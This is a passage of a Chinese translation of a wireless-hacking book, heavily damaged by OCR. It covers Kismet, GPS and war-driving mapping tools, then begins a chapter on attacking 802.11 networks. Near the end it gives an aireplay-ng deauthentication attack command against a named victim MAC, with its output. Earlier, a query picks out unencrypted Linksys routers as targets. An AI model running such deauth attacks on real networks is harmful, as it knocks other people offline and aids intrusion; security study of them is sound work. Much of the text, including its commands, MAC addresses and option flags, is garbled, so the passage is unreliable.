在 Linux 上 ，Kismet 是 扫描 器 。 尽 管 其 他 扫描 器 可 能 也 存在 ， 但 没有 一 款 能 像 Kismet 做 得 那么 好 。Kismet 也 可 以 运行 在 除 
了 Linux 之 外 的 其 他 平台 上 ， 包 括 FreeBSD、OS X 甚 至 是 通过 使 用 AirPcap 网 卡 适配器 运行 在 Windows 上 。 


Kismet 


Kismet 不 仪 是 一 个 扫 摘 工具 ，Kismet 其 实 是 一 个 802.11 协 议 数 据 包 捕 获 和 分 析 的 框 慷 。 事 实 上 ，Kismet 这 个 名 字 是 模 校 两 
可 的 。Kismet 其 实 来 源 于 两 个 二 进 制 文件 : kismet_ server 和 kismet_ client; 可 执行 文件 Kismet 仅 仅 是 一 个 shell 外 壳 脚 本 ， 对 它 
们 两 个 进行 典型 配置 。Kismet 的 系统 架构 如 下 图 所 示 。 


会“kismet (被 动 扫描 器 ) 


A 


/dev/ USB 接 口 的 GPS 设 备 


GPS 设备 的 守护 程序 
入 备用 守 扩 桂 序 ttvUSB0 


TCP 2947 


kismet 客户 病 TCP 2501 一 证 Kismet 服务 器 


奇 丑 无 比 的 图 形 用 户 界 面 (GUT) 


.pCcapdump 
.gDSsxml| 
.ettxt 
.netxml 


保存 的 数据 格式 


伴随 newcore 分 支 的 友 布 ，Kismet 可 以 在 运行 时 (run-time) 状态 中 目 动 配置 。 现 在 大 多 数 想 要 在 单一 网 卡 上 运行 Kismet 


的 人 ( 源 于 Kismet 行 话 ) 可 以 用 apt-get install kismet 安 装 Kismet， 然 后 从 命令 行 运行 Kismet。 基 于 curses 的 客户 端 将 启动 并 
入 你 使 用 基于 mac80211 的 驱动 程序 ) ， 并 


提示 你 服务 器 正在 启动 。 服 务 器 会 目 动 检测 网 卡 的 类 型 ,添加 监控 模式 虚拟 接口 ( 假 i 
按 其 方式 运行 。 如 果皮 布 版 本 中 没有 打包 最 新 的 版 本 ， 那 么 你 可 能 要 下 载 源 代码 并 纲 译 它 。Kismet 是 容易 编译 的 ， 下 面 是 编译 


2009~06—-R1. 七喜 工 :可 2 


woet http://www.kismetwireless.net/code/kismet-— 
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| 

[ tar -zxvf . /kismet-2009-06-R1.tar.da 
[:~]$ cd kismet—-2009-06-R1 
[ 

[ 


中 六 号 


a 09 


Lr 
-06-R1I]S$ ./configqure && make 
~/kismet—2 2 


站 
I 
Fy 5 

| 三 
09—0 | 


sudo make install 


提示 如 果 你 ] 相 得 作 为 首 六 ， 通用 户 开 了 2 执行 Kismet 及 要 使 用 Suidinstall PP 可 o 


记 住 ， 如 果 你 从 源 代码 编译 ， 那 么 默认 安装 目录 将 是 /usr/local。 这 意味 着 kismet.conf 文 件 将 在 /usr/local/etc 目 录 中 。 


配置 Kismet 


再 是 必要 的 操作 ， 因 为 Kismet 会 目 动 检测 哪个 源 网 卡 是 最 合适 的 ， 但 是 如 果 在 指定 的 


虽然 在 配置 文件 中 手动 设置 源 网 卡 不 
想 使 用 一 个 网 卡 进行 扫描 ， 那 么 设置 的 一 个 网 卡 作 为 源 是 一 个 好 主意 。 这 样 做 还 可 以 防止 在 


时 间 你 有 多 个 网 卡 存在 ， 而 你 这 时 只 
基于 curses 的 图 形 用 户 界面 中 ， 每 次 都 得 配置 你 的 源 网 卡 。 

[: >”]# vim /usr/local/etc/kismet.conf 
# See the README for full information 


interftacer opt1ions 


on the new Source format 


为 Kismet 配 0 置 GPS 


Kismet 依 赖 于 另 一 个 名 为 GPSD 的 程序 与 GPS 硬件 建立 会 话 。GPSD 通 过 一 个 串 行 端口 连接 到 GPS 装置 上 ， 然 后 通 
TCP 连 接 (默认 的 2947 端 口 ) 将 数据 提供 给 任何 程序 。GPSD 带 有 许多 分 布 部 件 ， 支 持 在 线 下 安装 (apt-get 


instalh) [GPSD。 一 旦 安装 好 ， 你 只 需要 通过 正确 的 参数 就 可 以 和 硬件 建立 会 话 。 


[:~]# gpsd /dev/ttyUSBO 


如 果 在 使 用 GPSD 中 有 问题 ， 该 程序 支持 通过 -D (debug， 调试 模式 ) 和 -N (no background， 不 要 背景 ) 两 个 有 用 的 调 
试 选项 在 调试 状态 下 进行 排查 。 例 如 ，gpsd-D 2-N-n/dev/ttyUSB0 会 让 你 看 到 实时 状态 下 正在 发 生 什么 。 可 以 通过 使 用 
telnet 或 netcat 命 令 连 接 到 GPSD 的 TCP 端 口 。 以 下 命令 连接 到 GPSD， 并 验证 一 个 正在 运行 的 连接 : 


SGPRMB, A, i A*UB 
于 


-= 


Gp, Tl326. 20555. 0066 :12152 .1101 ;WW T1061-0.2.N-25 5 计生 
其 中 的 r 命 令 告诉 GPSD 转 到 原始 的 NMEA 输 出 。 


提示 ”最近 的 GPSD 版 本 尽量 避免 默认 状态 下 绑 定 每 一 个 接口 。 如 果 你 通过 网 络 连接 GPSD 的 时 候 出 现 问题 ， 可 以 再 带 


运行 Kismet 


现在 你 已 经 在 笔记 本 电脑 上 配置 好 了 Kismet， 可 以 开始 使 用 它 了 。Kismet 将 在 启动 Kismet 的 目录 中 创建 一 个 批文 件 ， 所 以 
我 建议 创建 一 个 Kismetdumps 目 录 ， 以 避免 杂乱 无 章 。 


[~]5s 
[:~]$ cd Kismetdumps/ 
[ :~/K 


mkdir Klismetdumps 


L; 


Kismetdumps|]$ sudo kismet 


一 旦 开始 运行 Kismet， 会 提示 : “开始 运行 Kismet server 吗 ? ”回答 : “是 的 ”， 然 后 关闭 服务 器 窗口 。 这 时 ， 你 会 看 到 
如 下 类 似 的 显示 。 


提示 ”如 果 你 的 Kismet 窗 口 显示 不 正确 ， 可 能 是 终端 程序 有 问题 或 TERM 环 境 变 量 有 问题 。 试 试 在 终端 程序 rxvt 中 运行 ， 然 
后 设置 xterm 的 TERM 环 境 变 量 : 


rxvt -bg black -fg green; declare -x TERM="xterm"; kismet. 


新 的 Kismet 是 菜单 驱动 的 。 如 果 你 想 做 什么 事 ， 按 ~ 按钮 进入 菜单 状态 。 在 这 里 ， 你 可 以 改变 许多 显示 设置 。 在 网 络 状 态 按 


Enter ( 回 车 ) 键 将 市 来 “Network Detail View” (网 络 详细 视图 ) ， 其 中 包含 了 选 定 网 络 的 详细 信息 。 
Kismet 生 成 文件 


默认 情况 下 ，Kismet 将 在 程序 运行 中 生成 以 下 5 个 文件 : 


: .alert 报警 的 纯 文 本 日 志文 件 。Kismet 将 对 特别 关注 的 事件 发 送 警 报 ， 例 如 Metasploit 程 序 发现 了 一 个 疑似 的 驱动 程序 。 
- .gpsxml| XML 格式 的 GPS 日 志文 件 。 

.nettxt 纯 文 本 格式 的 网 络 信息 。 非 常 适 合 于 人 的 精读 。 

.netxm|l XML 格式 的 网 络 信 息 。 非 常 适合 计算 机 的 研究 。 


.pcapdump 通过 pcap 捕 获 的 实时 数据 通信 文件 。 这 取决 于 libpcap 版 本 ， 此 文件 可 能 包含 每 个 数据 包 的 信息 ， 包 括 GPS 坐 


ee 


~ kKispet Sort View 出 ndows 
Kismet 200 


Elapsed 
D0:02 US 
breathmericanNetwyork A N 的 | DD 


Ho IE HN 86 DB Net works 


BSSTD O00;18;25300:00+:690, encryption no, channel 3, 954.00 mbit 
INFO: Detected new managed network "marcyus", BSSID 00:18:39:45: 
dE:AE, encruyuption yes, channel 6, 54.00 mbit 
INFO: Detected new managed network "SUGARRAY , BSSID 00:14:6C:1 
a:bA+:56, encryption yes, channel 11, S4.00 mbit 


用 Kismet 可 视 化 数据 


多 年 来 ,已 经 编写 了 许多 脚本 用 于 将 Kismet 的 输出 转换 成 KML 格 式 文件 、 地 图 等 ， 但 它们 中 的 大 多 数 都 被 遗弃 了 。 最 新 的 
Kismet 可 视 化 工具 称 为 giskismet。giskismet 最 早出 现在 Shmoocon2009 上 (与 安全 相关 的 一 个 国际 年 度 会 议 。 一 一 译 者 
注 ) ， 并 且 运 行 在 最 新 版 本 的 Kismet 上 。 

giskismet 关于 giskismet 软 件 的 介绍 可 通过 维基 百科 网 址 进行 查阅 (http://my-trac.assembla.com/giskismet/wiki) 。 
通过 将 Kismet 输 出 的 .netxml 文 件 导 入 到 SQLite 数 据 库 (一 款 轻 量 级 的 数据 库 。 一 一 译 者 注 ) 中 来 运行 giskismet。 这 人 允许 你 通 
过 SQL 接 口 的 灵活 性 查询 基于 “战争 驾驶 ”测试 的 结果 。 人 在 下 载 并 引用 giskismet 安 闭 包 之 前 ， 可 能 还 需要 安 六 一 些 giskismet 所 
依赖 的 前 提 程 序 : 
:~] 53Sudo apt-get install libxml—-libxml-perl libdbi-perl libdbd-—sglite3-per 


现在 ， 可 以 得 到 通过 “战争 雪 驶 ”行动 获得 的 结果 ， 然 后 将 它们 像 下 面 这 样 填充 到 giskismet 中 


[:~/giskismet/trunk]s$ perl ./giskismet 一 X Kismet-20091022-16-44-02-1.netxml 
Rismet—z2009L022- -160621 02-1 .netxnml 

Checking Database for BSSID: O00:E0:98:DF:A4A:92 ... AP added 

checking Database or BSSID: OQ0:EO0:98:Fl1:6b6D:3C sis AP added 


一 旦 完成 上 述 操作 ， 在 当前 目录 中 将 有 一 个 SQLite 数 据 库 ， 名 称 是 wireless.dbl: 


[:~/gliskismet/trunk]$ file ./wireless.dbl 
/wireless.dbl: SOQOLite 3.x database 


到 目前 为 止 ， 我 们 只 是 将 数据 导入 到 了 数据 库 中 ， 下 面 有 一 些 例 子 说 明 如 何 使 用 这 些 数据 。 让 我 们 开始 导出 所 有 之 前 曾 导 入 
的 网 络 信息 ， 这 将 我 们 收集 的 所 有 数据 生成 一 个 KML 文 件 。 
[:~/giskismet/trunk]s perl giskismet -可 "Select * from wireless" 
-oO output all.kml 
接 下 来 ， 让 我 们 在 这 些 数 据 中 找 所 有 无 安全 设置 的 Linksys 路 由 器 : 
perl ./giskismet -9 "select * from wireless Where ESSID="1]inksys' 


and Encryption='None"™" -oO UnsecureLinksys. kml 


前 面 的 例子 只 是 大 致 了 解 了 如 何 用 SQL 查询 语句 查询 扫 摘 的 结果 。 当 采用 注入 方式 注入 大 型 应 用 ， 你 可 以 使 用 这 个 方式 很 容 
易 地 从 非 目 标 数据 中 过 滤 出 目标 数据 。giskismet 生 成 输出 的 例子 如 下 图 所 示 。 
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在 谷歌 地 图 上 实时 地 标定 位 置 


Linux 是 让 谷歌 地 图 (Google Earth) 来 显示 你 的 当前 位 置 的 唯一 平台 ，Google Earth 4Pro 集 成 了 支持 实时 位 置 显示 的 功 


能 。 然 而 当 Google Earth 5 推出 时 ， 这 一 功能 被 取消 了 。 勤 秀 的 开放 源码 开 友 者 提出 了 一 毕 目 己 的 办 法 来 解决 这 个 问题 。 他 们 
利用 一 毕 谷歌 称 为 网 络 链接 (Network Link) 的 功能 实现 的 。 


侣 歌 地 图 的 Netlink 基 本 上 是 一 个 小 的 KML 文 件 ， 衣 文件 让 谷歌 地 图 重新 周期 性 地 载 入 另 一 个 人 ML 文件， 几乎 像 刷 新 网 页 一 
样 。 生 成 第 二 个 KML 文 件 的 程序 可 以 做 到 它 想 要 什么 融 可 以 得 到 什么 。 例 如 ， 它 为 了 定位 可 以 查询 本 地 GPs 设 备 ， 并 且 创 建 一 
个 KML 文 件 ， 该 KML 文 件 描述 了 上 述 信息 。 这 个 程序 束 是 gegpsd.py。 详 细 信 息 可 以 查询 网 址 : 


http://www2.warwick.ac.uk/fac/sci/csc/people/computingstaff/jaroslaw zachwieja/gegpsd/。 


警告 gegpbsd.py 直 接 与 串 行 端口 进行 会 话 ， 而 不 是 与 GPSD 的 上 一 层 应 用 程序 进行 会 话 。 当 运行 gegbsd.py 的 时 候 ， 其 他 设备 


不 能 访问 GPS 奈 置 ， 包 括 GPSD 或 Kismet。 


下 载 gegpsd.py 到 谷歌 地 图 的 安 妆 目 录 (默认 的 是 : /opt/google-earth) 。 还 需要 下 载 网 络 链接 文件 并 将 它 保存 
为 /opt/google-earth/Realtime GPS.kml。 最 后 ， 可 能 还 需要 安装 python-serial 模 块 : 


[:/opt/google-earth]j$ sudo apt-get install python-serial 
[:/opt/gqoogle-earth]$ cat Realtime\ GPS.kml 
<?xml] version="1.0" encoding="UTF-—8"?> 
<kml] xmlns="http://earth.google.com/kml/2.2"> 
<NetworkLink> 
<name>Realtime CGPS</name> 
<open>1l</open> 
<Link> 
<href>./realtime/Realtime GPS.kml</href> 
<refreshMode>conInterval</refreshMode> 
</Link> 
</NetworkLink> 
</kml> 


然后 ， 运 行 在 python 下 运行 脚本 : 


[:/opt/google-earth|s sudo mkdir ./realtime 


S 
[:/opt/google-earth]$ sudo Python ./gegpsd.py -Pp /dev/ttyUSBO 
一 旦 运行 谷歌 地 图 ， 束 可 以 加 载 包含 网 络 链接 (Network Link) 的 文件 了 ， 单 击 File (文件 ) |Open ( 打 
开 ) |/opt/google-earth/Realtime GPS.kml， 现 在 应 该 能 够 观看 你 的 位 置 在 实时 地 移动 。 


提示 如果 你 没 看 到 生成 的 ./realtime/Realtime GPS.kml 文 件 ， 那 么 就 说 明 gegpsd.py 解 析 GPS 装 置 的 输出 时 出 现 问题 ， 请 仔细 
检查 串 行 端 只 的 波 特 率 ， 然 后 重 试 。 


不 平 的 是 ， 由 于 gegpsd.py 脚 本 会 直接 与 串口 进行 会 话 ， 所 以 在 同一 时 间 段 里 ， 其 他 应 用 程序 (如 GPSD 或 Kismet) 不 可 以 
再 使 用 这 一 设备 。 所 以 我 希望 ， 在 不 久 的 将 来 ， 有 一 个 新 版 gegpsd.py 与 GPSD 的 TCP 端 口 进 行 会 话 ， 可 以 在 运行 Kismet 的 同时 
允许 用 尸 以 可 视 化 的 效果 显示 当前 的 位 置 。 


[1] apt-get 是 一 条 Linux 命 令 ， 主 要 用 于 自动 从 互联 网 的 软件 仓库 中 搜索 、 安 装 、 升 级 、 印 载 软件 或 操作 系统 。 与 之 对 应 的 另 一 个 


命令 是 yum 命 令 ， 默 认 的 Linux 有 些 支持 前 者 ， 有 些 支持 后 者 ， 但 可 以 通过 安装 相应 的 支持 包 支 持 对 方 。 译 者 注 


2.6 ”移动 扫 拍 工具 


俊 源 的 扩张 使 镶 能 手机 最 终 变 成 可 行 的 802.11 扫 摘 工 具 。 过 去 少数 移动 工具 一 直 可 用 于 寻找 网 络 设备 ， 但 不 像 笔 记 本 电脑 
扫 摘 器 那么 强大 ， 现 在 iPhone 的 无 线 网 络 扫 拉 器 WiFifoFum 具 备 了 一 个 基于 笔记 本 电脑 扫 摘 器 的 大 多 数 功能 。 


@” Wirifofum (主动 扫 拍 器 ) 
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WiFiFoFum 是 目前 可 以 运行 于 第 三 方 平台 Cydia/Installerl1l 上 的 免费 软件 ， 不 熟悉 这 个 工具 的 读者 可 用 越狱 (jailbreak) 
的 方式 破解 手机 试 试 。 使 用 WiFiFoFum 就 像 使 用 其 他 iPhone 应 用 程序 一 样 容易 。 能 使 WiFiFoFum 与 其 他 移动 扫描 工具 区 分 开 
的 是 它 的 综合 制图 能 力 。 当 你 登录 进入 WiFiFoFum 后 ， 应 用 程序 会 通过 iPhone 内 置 的 地 理 定 位 能 力 在 网 络 日 志文 件 中 存储 信号 
最 强 的 位 置 。WiFiFoFum 可 以 显示 谷歌 地 图 本 地 日 志 或 友 送 KML 文 件 到 一 个 电子 邮件 地 址 中 。 地 图 截图 如 下 图 所 示 。 


Pa 
用 


| OQ http://apps.dynamicallyloaded.co... 人 是 


Directlions 


警告 WiFiFoFum 最 初 发 布 是 在 官方 iPhone 应 用 程序 商店 。 不 幸 的 是 ， 它 私自 利用 Apple 电 脑 的 框架 ， 后 来 被 迫 删 除 。 除 非 
Apple 推 翻 其 取消 WiFiFoFum 的 决定 ， 否 则 你 将 需要 通过 越狱 方式 破解 他 们 的 iPhone 来 安装 WiFiFoFum 或 类 似 程序 。 然 而 越狱 方式 
破解 iPhone 很 简单 ， 它 可 能 会 导致 〈 因 人 为 破坏 而 使 手机 ) 保修 无 效 ， 并 且 这 一 内 容 超出 了 本 书 的 范围 。 对 越狱 破解 有 兴趣 的 读 
者 可 直接 从 iPhone 开发 团队 (http://blogiphone-dev.org/) 下 载 工 具 以 便 尝试 。 


因为 WiFiFoFum 的 使 用 过 于 简单 ， 所 以 没 必 要 再 详细 解释 每 一 条 指令 。 下 面 有 一 些 提 示 ， 在 使 用 的 时 候 ， 可 以 得 到 更 好 的 
结果 : 


` 设置 Scan Frequency (扫描 频率 ) 为 Continuous (连续 的 ) ， 可 以 提高 电池 寿命 。 


: 将 手机 放 在 正确 的 位 置 ， 可 以 获得 更 精确 的 地 理 定位 数据 。 如 果 在 车 辆 内 ， 将 手机 贴 在 玻璃 上 将 最 大 限度 地 扩大 内 部 天 线 


的 范围 。 
` 忽略 Radar View (雷达 图 像 ) 。 现 实 与 显示 器 上 图 像 的 关系 总 是 很 弱 的 。 
[1] Cydia 是 Sautik 公 司 开发 的 用 于 在 iPhone/iPod 上 人 安装 第 三 方 应 用 程序 的 平台 ，Installer 是 Nullfivet 公 司 开 发 的 一 款 用 于 在 


iPhone/iPod 上 安装 第 三 方 应 用 程序 的 平 O 二 者 功 能 类 似 O 译 者 注 


2.7 ”在线 地 图 服务 (WIGLE 和 Skyhook) 


到 目前 为 止 ， 你 已 经 看 到 从 “战争 驾驶 ”方式 产生 地 图 最 可 靠 的 方法 是 使 用 每 个 独立 应 用 程序 的 谷歌 地 图 KML 导 出 插件 ， 
其 他 选项 包括 上 传 扫 摘 数据 到 服务 器 并 让 服务 器 为 你 处 理 。 这 种 方式 的 一 个 很 大 好 处 是 : 可 以 将 “战争 驾驶 ”信息 分 享 给 其 他 的 
人 ， 并 共同 创建 一 个 更 大 的 数据 库 。 


WIGLE 


运 今 为 止 最 大 的 商业 数据 库 是 由 wigle.net (无 线 地 理 日 志 引 擎 ) 所 掌控 。 它 们 有 各 种 各 样 的 客 尸 端 ， 可 以 从 任何 流行 的 格 
陈 导 入 数据 。 然 而 ， 地 图 的 质量 有 些 令 人 不 太 满 曲 。 流 行 的 WIGLE 客 户 闯 jiGLE 的 截图 ， 如 图 2-6 所 示 。 
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图 2-6 ”通过 比较 ，WIGILE 地 图 使 Google Earth 看 上 去 更 好 


Skyhook 


skyhook 就 像 是 WIGLE 的 逆 过 程 。Skyhook 是 一 个 营利 性 的 地 理 定位 服务 ， 可 以 利用 802.11 的 AP。 基 本 上 ， 你 可 以 提交 身 
程 内 网 络 的 BSSID，Skyhook 会 告诉 你 最 可 能 的 位 置 是 哪里 。 该 计划 最 大 的 亮点 是 数据 库 具 有 自我 修正 功能 。 如 果 Skyhook 最 初 
注册 3 个 纽约 的 AP， 然 后 客户 端 报警 其 中 有 一 个 被 佛罗里达 州 迈阿密 市 的 AP 所 定位 ， 则 Skyhook 后 端 可 以 确定 有 纽约 的 退休 人 
员 最 终 因 天 气 原因 搬 到 了 佛罗里达 州 ， 且 随身 带 着 AP。 这 种 自我 修正 的 性 质 允 许 Skyhook 可 以 根据 一 次 大 的 “战争 驾驶 ”给 它 
的 数据 填充 数值 。 现 在 它 的 用 户 保持 最 新 状态 。 


如 果 你 怀疑 Skyhook 的 准确 性 ， 则 建议 通过 你 自己 的 BSSID 查 询 服 务 。 下 图 所 示 的 是 一 个 执行 这 一 功能 的 脚本 : 


#!1/binysh 

# A simple /bin/sh interface into the skyhook database. 
# inspired by a one-liner attrilbuted to "George" 
# be sure to pass the mac address in without any ":"'"5s 
# i.e. .A/skyhook.sh 000102030405 


echo "looking up mac address: $1" 


curl -header "Content-Type: text/xml™” -~-data 
"<?xXml] version="1.0'?><LocationRO xmlns="'http://skyhookwireless.com/ 


wps/2005" Version="2.6' street-address-lookup="full'»> 


<authentication version='2.0'> <simple><username>]jc</ 
usSsername><realm>802.1llmercenary.net</realm> </simple></authentication> 


<access-polint> 

<mac>$1</mac><signal-strength>-50</signal-strength> 

</access-point> 

</LocationRO>" 
https://api.skyhookwireless.com/wps2/location 


通过 在 BSSID 后 面 (注意 没有 分 号 ) 运行 ./skyhook.sh， 你 会 看 到 Skyhook 是 否 拥 有 你 的 信息 。 在 我 们 的 测试 中 ， 该 数据 库 
已 经 非常 准确 ， 并 且 数 据 是 最 新 的 。 几 个 星期 后 ， 当 本 书 的 作者 之 一 离开 后 ， 他 的 AP 突 然 出 现在 了 新 的 正确 位 置 上 。 


2.8 ”本 童 小 结 
本 章 涵 兽 了 在 3 个 主流 的 操作 系统 上 使 用 扫描 器 的 详细 内 容 ， 还 包含 了 使 用 每 一 个 平台 的 优点 和 缺点 ， 以 及 在 每 个 操作 系统 


上 配置 和 使 用 这 些 主要 的 扫 摘 器 工具 的 细节 。 本 章 还 介绍 了 各 种 独立 的 和 集成 的 可 视 化 工具 ， 可 以 借助 这 些 工 具 及 其 所 收集 的 信 
息 继续 关注 无 线 网 络 攻 击 技术 。 


第 3 章 ”攻击 802.11 无 线 网 络 


无 线 网 络 的 安全 有 一 个 许多 磨难 的 过 去 ， 特 别 是 WEP 已 被 丰 解 的 次 数 太 多 了 ， 所 以 你 会 党 得 人 们 可 能 懒得 再 实施 这 类 攻击 
了 。 本 章 涵 苹 的 工具 和 技术 回避 了 那些 使 用 WPA 缺 点 网 络 安全 系统 。 在 可 能 的 情况 下 ， 在 Linux、Windows 以 及 OS X 等 操作 系 
统 上 提出 攻击 方案 。 


3.1 攻击 的 基本 类 型 


无 线 网 络 的 防御 可 以 分 为 几 个 不 同 的 类 别 。 第 一 类 防御 是 “完全 无 效 ”， 另 一 种 说 法 就 是 “不 引 人 注 目地 安全 通过 ”， 即 防 
御 系 统 让 的 那些 真正 有 兴趣 攻击 的 人 都 可 以 是 悄 无 声息 地 突破 。 


第 二 类 防御 可 以 被 归 类 为 “麻烦 ”。 通 常 ，WEP 协 议和 基于 字典 的 WPA-PSK 密 和 码 适 合 这 一 类 。 即 给 一 点 时 间 和 技能 ， 攻 击 
者 就 可 以 恢复 任何 静态 的 WEP 密 钥 。 


一 旦 你 去 掉 的 “麻烦 ”的 安全 措施 ， 束 开始 接触 到 第 三 类 防御 : 需要 真正 努力 和 一 些 熟 练 扩 能 的 网 络 。 大 多 数 网 络 不 是 这 种 
好 的 保护 。 在 这 一 类 别 的 网 络 中 使 用 了 较 好 配置 的 WPA。 用 于 攻击 较 好 配置 的 WPA 网 络 的 技术 将 在 第 4 章 中 详细 介绍 。 


3.2 ”通过 隐 镍 钓 得 安全 


今天 ， 许 多 无 线 网 络 都 有 隐藏 模式 (hidden mode) 或 非 广播 模式 (nonbroadcasting mode) 。 这 些 网 络 在 其 信 标 数据 
包 中 并 不 包括 其 SSID 名 称 ( 即 网 络 名 称 ) ， 它 们 也 不 回复 广播 类 的 探测 请 求 。 像 这 样 配置 网 络 的 人 将 他 们 的 SSID 作 为 一 种 秘密 
手段 。 这 样 做 的 人 也 可 能 是 倾向 于 在 AP 上 设置 MAC 地 址 过 滤 。 


一 个 SSID 不 是 一 个 秘密 。 它 将 明文 打包 在 许多 数据 包 中 ， 而 不 只 是 打包 在 信 标 数据 包 中 。 事 实 上 ， 之 所 以 说 SSID 非 常 重 
要 ， 是 因为 为 了 向 AP 友 送 一 个 天 联 请 求 你 需要 知道 上 已， 这 意味 着 每 一 个 合法 的 客 尸 端 在 尝试 连接 网 络 的 上 时候， 都 要 明确 地 友 壕 
它们 的 SSID。 


被 动 噢 探 器 可 以 很 容易 地 利用 这 一 点 而 获得 SS1D。 如 果 你 曾经 看 过 Kismet 或 KisMAC 神 秘 地 填写 隐藏 网 络 的 名 称 ， 那 么 这 
是 因为 一 个 合法 的 客 尸 端 友 送 了 一 个 这 样 的 帧 。 如 果 你 等 得 足够 长 久 (并 且 禁 用 信道 跳 频 ) ， 那 么 你 会 最 终 吸 引 某 人 加 入 网 络 并 
获得 她 的 SSID。 当 然 ， 如 果 你 实在 不 想 等 那么 长 时 间 ， 你 还 可 以 强 握 住 用 尸 的 手 ， 让 她 主动 加 入 网 络 。 


会 “组 除 认证 的 用 户 


下 人 由 


获得 一 个 你 感 兴趣 的 网 络 的 名 称 ， 最 简单 的 方式 是 将 一 个 合法 的 用 户 从 网 上 踢 挥 。 如 前 所 述 ， 关 联 请 求 (也 可 能 是 重新 关联 
请 求 ) 数据 包 会 携 市 清晰 的 9S1D 名 称 。 通 过 将 一 个 用 户 踢 挥 线 ， 你 可 以 强迫 他 友 送 一 个 重新 关联 请 求 ， 同 时 从 中 可 以 观察 到 
SSID, 


之 所 以 你 可 以 这 样 做 ， 是 因为 802.11 的 管理 帧 是 不 需要 授权 的 ， 如 果 管 理 帧 需要 授权 验证 ， 那 么 用 户 将 能 够 告诉 你 你 的 解 
除 认证 数据 包 从 AP 中 分 离 出 来 了 。 所 以 ， 你 需要 做 的 是 给 用 尸 友 送 一 个 看 起 来 像 是 来 自 AP 的 数据 包 。 用 尸 并 不 能 分 辨 其 中 的 区 
别 ， 这 时 无 续 驱 动 程序 将 立即 重新 连接 。 然 后 ， 用 户 将 上 友 送 一 个 市 有 9SsID 的 重新 天 联 请 求 ， 你 的 扫 摘 器 融 可 借 机 知道 网 络 的 名 


称 。 

警告 ”不论 是 什么 类 型 的 AP 在 使 用 ， 这 种 攻击 都 是 有 效 的 。 即 使 WPA2 也 不 能 提供 帮助 ， 因 为 管理 帧 仍然 是 未 加 密 的 和 未 经 
授权 的 。IEEE 协 会 已 经 创建 了 一 个 工作 组 来 解决 这 个 问题 ， 但 到 现在 为 止 ， 这 种 漏洞 之 窗 仍 然 对 外 敞开 。 
在 Linux 上 加 载 一 个 解除 认证 的 攻击 


下 面 的 示例 演示 了 如 何在 Linux 上 通过 aireplay-ng 程 序 (aireplay-ng 是 一 种 包含 在 Aircrack-ng 软 件 开 友 包 中 的 实用 工具 ) 
完成 一 个 简单 的 解除 认证 攻击 。 受 害 者 站 点 的 MAC 地 址 是 00:23:6C:98:7C:7C， 它 目前 是 在 信道 1 上 与 网 络 相 关联 的 ， 其 SSID 值 
是 00:14:BF:3A:6C:EF。 


为 什么 在 Linux 中 ， 会 有 这 么 多 的 无 线 命令 行程 序 


任何 用 过 Linux 一 段 时 间 的 人 都 可 能 变 得 肖 形 ， 因 为 控制 一 张 无 线 网 卡 需要 不 同 的 命令 。 那 些 过 去 使 用 madwifi 的 人 通常 习惯 
使 用 wlanconfig 命 令 ， 然 而 最 老 的 和 当前 的 驱动 程序 使 用 iwconfig 命 令 ， 并 且 炎 端 用 户 可 能 已 经 熟悉 最 新 的 Linux 无 线 实用 工 


BL: Two 
虽然 iwconfig 命 令 可 能 续 使 用 一 段 时 间 ， 但 所 有 新 的 无 线 驱 动 器 功能 将 通过 iw 命 令 进行 访问 。 你 可 能 需要 手动 将 iw 命 
在 线 下 安装 (apt-get) 到 发 行 版 上 上。 虽然 所 有 这 些 命令 完成 相同 的 事情 它们 是 通过 调用 不 同 的 API 实 现 的 。wlanconfig 中 的 


并行 证 


wlanconfig 程 序 本 身 就 是 从 madwifi 脱 身 出 来 的 。 它 通过 专用 非 标准 接口 进行 通信 。 所 有 “ 老 的 ” iw 命令 (如 iwconfig、iwlist、 
iwptiv) 都 经 过 无 线 扩 展 的 API， 这 些 新 的 Iw 命令 使 用 的 是 netlink/cfg80211 的 API， 项 望 这 将 是 近 段 时 间 内 ， 最 新 的 无 线 标准 。 


由 于 配置 实用 程序 多 种 多 样 ， 所 以 常常 忘记 每 个 驱动 程序 使 用 什么 类 型 的 通信 最 简单 。 用 户 为 记 住 所 有 的 细节 感到 失望 ， 所 
以 应 鼓励 用 户 使 用 aitrmon-ng。airmon-ng 是 一 个 包含 在 Aircrack-ng 中 的 实用 工具 ， 该 工具 是 专门 用 来 处 理 给 定 驱 动 程序 或 内 核 的 所 


有 监控 模式 的 详细 信息 。 
要 手动 配置 接口 ， 或 者 需要 一 个 公共 的 命令 行 例子 作为 快速 参考 ， 可 以 使 用 下 面 提供 的 命令 : 
: 执行 主动 扫描 : 
# iwlist wlan0 scan 
在 已 有 的 接口 上 设置 监控 模式 : 
# lwconfig wlan0 mode monitor 


# jw dev wlan0 set monitor none 


“ 手动 设置 信道 


# lwconiig wlan0 channel 1 
# ijw dev wlan0 set channel |] 
手动 启动 802.11n 的 40MHz 模 式 : 


# jw dev WLan0 set channel 6 HTA0+ or 


# ijWwW dev wland0 set channel 6 HT40— 
+/ 一 号 表示 比 指定 值 高 于 或 低 于 20M Hz 的 相 邻 信道 
创建 一 个 监控 模式 的 接口 (只 针对 mac80211) : 


i# jw dev wlan0 interface add mond type monitor 
: 撤销 一 个 虚拟 接口 (只 针对 mac80211) : 
# ijw dev mon0 del 


在 下 面 的 例子 中 ， 我 们 通过 使 用 Kismet 检 测 出 信道 1 上 有 一 个 隐 蕊 的 网 络 。 我 们 已 指示 Kismet 锁 定 到 信道 
1 (Kismet|Config Channel (配置 信道 ) ， 并 且 准 备 解 除 所 检测 到 的 客 尸 端的 认证 。 因 为 Kismet 为 我 们 创建 了 一 个 监控 模式 接 
口 ， 所 以 我 们 可 以 利用 它 解 除 认证 攻击 。 


六 令 行 参 数 有 点 儿 混 乱 。 参 数 -deauthin 指 示 aireplay 执 行 解除 认证 攻击 。 后 面 的 1 表示 尝试 运行 攻击 的 序号 。 目 标 地 址 的 措 
定 是 用 参数 -c 和 和 参数 -a 表示 的 是 BSSID。 


[:~]# alreplay-ng -~-deauth 1 -a O00:22:6B:96:50:45 -Cc 00032326C2982:7C37CE wlanlmon 
18:01:32 Waiting for beacon frame (BSSID: 00:22:6B:96:50:45) on channel 1 
18:01:32 Sending 64 directed DeAuth. STMAC: [00:23:6C:98:7C77C] 工时 66 ACKs] 


过 执行 这 种 攻击 ,我 们 将 友 送 数 百 个 解除 认证 数据 包 (确切 的 个 数 似乎 因 驱 动 程序 的 不 同 而 有 所 变化 ) ， 用 于 解除 AP 的 
